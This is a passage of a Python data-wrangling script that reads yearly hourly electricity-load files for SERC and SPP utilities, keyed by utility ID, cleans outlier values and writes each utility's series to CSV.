1996 : (pd.read_fwf('%s/serc/1996/CEPC96' % (fulldir)).iloc[:-1, 1:]/1000).values.ravel(),
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/CEPC97' % (fulldir)).readlines()[5:]]).iloc[:-1, 1:].astype(float)/1000).values.ravel(),
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/CEPC98' % (fulldir)).readlines()]).iloc[:, 1:].astype(float)).values.ravel(),
2000 : pd.read_excel('%s/serc/2000/CEPC00' % (fulldir), sheetname=1, skiprows=3)['MW'].values,
2001 : pd.read_excel('%s/serc/2001/CEPC01' % (fulldir), sheetname=1, skiprows=3)['MW'].values,
2002 : pd.read_excel('%s/serc/2002/CEPC02' % (fulldir), sheetname=0, skiprows=5)['MW'].values,
2002 : pd.read_excel('%s/serc/2002/CEPC02' % (fulldir), sheetname=0, skiprows=5)['MW'].values
},
3408 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/CEPB93' % (fulldir)).readlines()[12:]])[1].astype(float)/1000).values,
1994 : (pd.DataFrame([i.split() for i in open('%s/serc/1994/CEPB94' % (fulldir)).readlines()[10:]])[1].astype(float)).values,
1995 : (pd.DataFrame([i.split() for i in open('%s/serc/1995/CEPB95' % (fulldir)).readlines()[6:]])[2].astype(float)).values,
1996 : (pd.DataFrame([i.split() for i in open('%s/serc/1996/CEPB96' % (fulldir)).readlines()[10:]])[2].astype(float)).values,
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/CEPB97' % (fulldir)).readlines()[9:]])[2].astype(float)).values,
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/CEPB98' % (fulldir)).readlines()[9:]])[2].astype(float)).values,
1999 : (pd.DataFrame([i.split() for i in open('%s/serc/1999/CEPB99' % (fulldir)).readlines()[8:]])[2].astype(float)).values,
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/CEPB00' % (fulldir)).readlines()[11:]])[2].astype(float)).values,
2001 : (pd.DataFrame([i.split() for i in open('%s/serc/2001/CEPB01' % (fulldir)).readlines()[8:]])[2].astype(float)).values,
2002 : (pd.DataFrame([i.split() for i in open('%s/serc/2002/CEPB02' % (fulldir)).readlines()[6:]])[4].astype(float)).values,
2003 : (pd.DataFrame([i.split() for i in open('%s/serc/2003/CEPB03' % (fulldir)).readlines()[6:]])[2].astype(float)).values
},
12293 : {
2000 : (pd.read_csv('%s/serc/2000/MEMP00' % (fulldir)).iloc[:, -1]/1000).values,
2001 : (pd.DataFrame([i.split() for i in open('%s/serc/2001/MEMP01' % (fulldir)).readlines()[1:]])[3].str.replace(',', '').astype(float)/1000).values,
2002 : (pd.read_csv('%s/serc/2002/MEMP02' % (fulldir), sep='\t').iloc[:, -1].str.replace(',', '').astype(float)/1000).values,
2003 : pd.read_csv('%s/serc/2003/MEMP03' % (fulldir)).iloc[:, -1].str.replace(',', '').astype(float).values
},
5416 : {
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/DUKE99' % (fulldir)).readlines()[4:]])[2].astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/DUKE00' % (fulldir)).readlines()[5:]])[2].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/DUKE01' % (fulldir)).readlines()[5:]])[2].astype(float).values,
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/DUKE02' % (fulldir)).readlines()[5:]])[2].astype(float).values,
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/DUKE03' % (fulldir)).readlines()[5:-8]])[2].astype(float).values,
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/DUKE04' % (fulldir)).readlines()[5:]])[2].astype(float).values
},
6411 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/FLINT93' % (fulldir)).readlines()])[6].astype(float)/1000).values,
1994 : ((pd.DataFrame([i.split() for i in open('%s/serc/1994/FLINT94' % (fulldir)).readlines()[:-1]])).iloc[:, -1].astype(float)/1000).values,
1995 : ((pd.DataFrame([i.split() for i in open('%s/serc/1995/FLINT95' % (fulldir)).readlines()[1:]]))[3].astype(float)/1000).values,
1996 : (pd.DataFrame([i.split() for i in open('%s/serc/1996/FLINT96' % (fulldir)).readlines()[3:-2]]))[2].astype(float).values,
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/FLINT97' % (fulldir)).readlines()[6:]]))[3].astype(float).values,
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/FLINT98' % (fulldir)).readlines()[4:]]))[2].astype(float).values,
1999 : (pd.DataFrame([i.split() for i in open('%s/serc/1999/FLINT99' % (fulldir)).readlines()[1:]]))[1].astype(float).values,
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/FLINT00' % (fulldir)).readlines()[2:]]))[4].astype(float).values
},
7639 : {
1993 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1993', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1993', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1994 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1994', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1994', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1995 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1995', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1995', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1996 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1996', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1996', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1997 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1997', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1997', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1998 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1998', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1998', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1999 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1999', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1999', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
2000 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='2000', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='2000', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
},
10857 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/LCEC93' % (fulldir)).readlines()[:-1]]).iloc[:, 3:].astype(float).values.ravel(),
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/LCEC94' % (fulldir)).readlines()[:-1]]).iloc[:, 3:].astype(float).values.ravel()
},
13204 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/NPL93' % (fulldir)).readlines()[6:]])[2].astype(float).values,
1994 : pd.read_fwf('%s/serc/1994/NPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
},
13994 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/OPC93' % (fulldir)).readlines()[4:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1995 : pd.DataFrame([i.split() for i in open('%s/serc/1995/OPC95' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/OPC96' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/OPC97' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/OPC98' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/OPC99' % (fulldir)).readlines()[18:]])[2].astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/OPC00' % (fulldir)).readlines()[19:]])[2].astype(float).values
},
17539 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/SCEG93' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
1995 : pd.DataFrame([i.split() for i in open('%s/serc/1995/SCEG95' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/SCEG96' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/SCEG97' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/SCEG98' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values,
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/SCEG99' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/SCEG00' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/SCEG01' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values
},
17543 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/SCPS93' % (fulldir)).readlines()[:]]).iloc[:, 1:].astype(float).values.ravel(),
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/SCPS96' % (fulldir)).readlines()[:-1]]).astype(float).values.ravel(),
1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/SCPS97' % (fulldir)).readlines()[1:-3]]).iloc[:, 4:-1].astype(float).values.ravel(),
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/SCPS98' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].replace('NA', '0').astype(float).values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/SCPS99' % (fulldir)).readlines()[1:-1]]).iloc[:, 2:-1].replace('NA', '0').astype(float).values.ravel(),
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/SCPS00' % (fulldir)).readlines()[:]]).iloc[:, 2:].replace('NA', '0').astype(float).values.ravel(),
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/SCPS01' % (fulldir)).readlines()[:]]).iloc[:, 2:].replace('NA', '0').astype(float).values.ravel(),
2002 : pd.read_excel('%s/serc/2002/SCPS02' % (fulldir), header=None).dropna(axis=1, how='all').iloc[:, 2:-1].values.ravel(),
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/SCPS03' % (fulldir)).readlines()[:]]).iloc[:, 2:].replace('NA', '0').astype(float).values.ravel(),
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/SCPS04' % (fulldir)).readlines()[1:]]).iloc[:, 1:-1].replace('NA', '0').astype(float).values.ravel()
},
17568 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/SMEA93' % (fulldir)).readlines()[5:]])[2].astype(float)/1000).values.ravel(),
1994 : (pd.DataFrame([i.split() for i in open('%s/serc/1994/SMEA94' % (fulldir)).readlines()[5:]]).iloc[:, -1].astype(float)).values,
1996 : ((pd.DataFrame([i.split() for i in open('%s/serc/1996/SMEA96' % (fulldir)).readlines()[:]])).iloc[:, -24:].astype(float)/1000).values.ravel(),
1997 : pd.read_excel('%s/serc/1997/SMEA97' % (fulldir), sheetname=1, header=None, skiprows=1).iloc[:, 1:].values.ravel(),
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/SMEA98' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/SMEA99' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel(),
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/SMEA00' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel(),
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/SMEA02' % (fulldir)).readlines()[2:]])[2].astype(float).values.ravel(),
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/SMEA03' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel()
},
18642 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/TVA93' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1994 : (pd.DataFrame([i.split() for i in open('%s/serc/1994/TVA94' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1995 : (pd.DataFrame([i.split() for i in open('%s/serc/1995/TVA95' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1996 : (pd.DataFrame([i.split() for i in open('%s/serc/1996/TVA96' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/TVA97' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/TVA98' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/TVA99' % (fulldir)).iloc[:, 2].astype(float).values,
2000 : pd.read_excel('%s/serc/2000/TVA00' % (fulldir)).iloc[:, 2].astype(float).values,
2001 : pd.read_excel('%s/serc/2001/TVA01' % (fulldir), header=None, skiprows=3).iloc[:, 2].astype(float).values,
2003 : pd.read_excel('%s/serc/2003/TVA03' % (fulldir)).iloc[:, -1].values
},
19876 : {
1993 : pd.read_fwf('%s/serc/1993/VIEP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/serc/1994/VIEP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/serc/1995/VIEP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/serc/1996/VIEP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/serc/1997/VIEP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1998 : pd.read_fwf('%s/serc/1998/VIEP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/serc/1999/VIEP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/VIEP00' % (fulldir)).readlines()[1:]])[2].astype(float)).values.ravel(),
2001 : (pd.DataFrame([i.split() for i in open('%s/serc/2001/VIEP01' % (fulldir)).readlines()[1:]])[2].astype(float)).values.ravel(),
2002 : (pd.DataFrame([i.split() for i in open('%s/serc/2002/VIEP02' % (fulldir)).readlines()[1:]])[2].astype(float)).values.ravel(),
2003 : (pd.DataFrame([i.split() for i in open('%s/serc/2003/VIEP03' % (fulldir)).readlines()[2:]])[3].astype(float)).values.ravel(),
2004 : (pd.DataFrame([i.split() for i in open('%s/serc/2004/VIEP04' % (fulldir)).readlines()[:]])[3].astype(float)).values.ravel()
},
20065 : {
1993 : pd.read_fwf('%s/serc/1993/WEMC93' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1995 : (pd.read_csv('%s/serc/1995/WEMC95' % (fulldir), skiprows=1, header=None, sep=' ', skipinitialspace=True)[3]/1000).values,
1996 : (pd.read_excel('%s/serc/1996/WEMC96' % (fulldir))['Load']/1000).values,
1997 : pd.read_excel('%s/serc/1997/WEMC97' % (fulldir), skiprows=4)['MW'].values,
1998 : pd.concat([pd.read_excel('%s/serc/1998/WEMC98' % (fulldir), sheetname=i).iloc[:, -1] for i in range(12)]).values,
1999 : pd.read_excel('%s/serc/1999/WEMC99' % (fulldir))['mwh'].values,
2000 : (pd.read_excel('%s/serc/2000/WEMC00' % (fulldir)).iloc[:, -1]/1000).values,
2001 : (pd.read_excel('%s/serc/2001/WEMC01' % (fulldir), header=None)[0]/1000).values
},
4958 : {
1999 : (pd.DataFrame([i.split() for i in open('%s/serc/1999/DU99' % (fulldir)).readlines()[1:]]).iloc[:-1, 2:].apply(lambda x: x.str.replace('[,"]', '').str.strip()).astype(float)/1000).values.ravel(),
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/DU00' % (fulldir)).readlines()[1:]]).iloc[:-1, 2:].apply(lambda x: x.str.replace('[,"]', '').str.strip()).astype(float)/1000).values.ravel(),
2003 : pd.read_excel('%s/serc/2003/DU03' % (fulldir)).iloc[:, -1].values
},
924 : {
1999 : pd.read_excel('%s/serc/1999/AECI99' % (fulldir))['CALoad'].values,
2001 : pd.read_excel('%s/serc/2001/AECI01' % (fulldir)).iloc[:, -1].values,
2002 : pd.Series(pd.read_excel('%s/serc/2002/AECI02' % (fulldir), skiprows=3).loc[:, 'Jan':'Dec'].values.ravel(order='F')).dropna().values
},
402290 : {
1996 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1996/ODECD96' % (fulldir)).readlines()[3:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1997 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1997/ODECD97' % (fulldir)).readlines()[4:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1998 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1998/ODECD98' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1999 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1999/ODECD99' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/ODECD00' % (fulldir)).readlines()[3:]])[4].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/ODECD01' % (fulldir)).readlines()[3:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/ODECD02' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/ODECD03' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/ODECD04' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values
},
402291 : {
1996 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1996/ODECV96' % (fulldir)).readlines()[3:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1997 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1997/ODECV97' % (fulldir)).readlines()[4:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1998 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1998/ODECV98' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1999 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1999/ODECV99' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/ODECV00' % (fulldir)).readlines()[3:]])[4].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/ODECV01' % (fulldir)).readlines()[3:]])[4].dropna().str.replace('[N/A]', '').replace('', '0').astype(float).values,
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/ODECV02' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/ODECV03' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/ODECV04' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values
},
195 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/APCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/APCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Alabama'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 2].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Alabama'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 2].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 2].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 1].values
},
7140 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/GPCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/GPCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).replace(np.nan, 0).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Georgia'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 3].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Georgia'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 3].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 3].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 2].values
},
7801 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/GUCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/GUCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Gulf'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 4].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Gulf'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 4].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 4].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 3].values
},
12686 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/MPCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/MPCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Mississippi'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 5].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Mississippi'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 5].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 5].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 4].values
},
16687 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/SECO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/SECO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Savannah'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 6].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Savannah'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 6].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 6].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 5].values
},
18195 : {
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['System'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 7].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Southern'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 7].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 8].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 7].values
}
}
serc.update({40229 : {}})
for i in serc[402290].keys():
serc[40229][i] = serc[402290][i] + serc[402291][i]
serc[189][2001][serc[189][2001] > 2000] = 0
serc[3408][2002][serc[3408][2002] > 2000] = 0
serc[3408][2003][serc[3408][2003] > 2000] = 0
serc[7140][1999][serc[7140][1999] < 0] = 0
serc[7140][1994][serc[7140][1994] > 20000] = 0
if not os.path.exists('./serc'):
os.mkdir('serc')
for k in serc.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(serc[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(serc[k][i]))) for i in serc[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./serc/%s.csv' % k)
###### SPP
# AECC: 807
# CAJN: 2777
# CLEC: 3265
# EMDE: 5860
# ENTR: 12506
# KCPU: 9996
# LEPA: 26253
# LUS: 9096
# GSU: 55936 <- 7806
# MPS: 12699
# OKGE: 14063
# OMPA: 14077
# PSOK: 15474
# SEPC: 18315
# WFEC: 20447
# WPEK: 20391
# CSWS: 3283
# SRGT: 40233
# GSEC: 7349
spp = {
807 : {
1993 : pd.read_csv('%s/spp/1993/AECC93' % (fulldir), skiprows=6, skipfooter=1, header=None).iloc[:, -1].values,
1994 : pd.read_csv('%s/spp/1994/AECC94' % (fulldir), skiprows=8, skipfooter=1, header=None).iloc[:, -1].values,
1995 : pd.read_csv('%s/spp/1995/AECC95' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
1996 : pd.read_csv('%s/spp/1996/AECC96' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
1997 : pd.read_csv('%s/spp/1997/AECC97' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
1998 : pd.read_csv('%s/spp/1998/AECC98' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
1999 : pd.read_csv('%s/spp/1999/AECC99' % (fulldir), skiprows=5, skipfooter=1, header=None).iloc[:, -1].values,
2003 : pd.read_csv('%s/spp/2003/AECC03' % (fulldir), skiprows=5, skipfooter=1, header=None).iloc[:, -2].values,
2004 : pd.read_csv('%s/spp/2004/AECC04' % (fulldir), skiprows=5, header=None).iloc[:, -2].values
},
2777 : {
1998 : pd.read_excel('%s/spp/1998/CAJN98' % (fulldir), skiprows=4).iloc[:365, 1:].values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/spp/1999/CAJN99' % (fulldir)).readlines()[:]])[2].astype(float).values
},
3265 : {
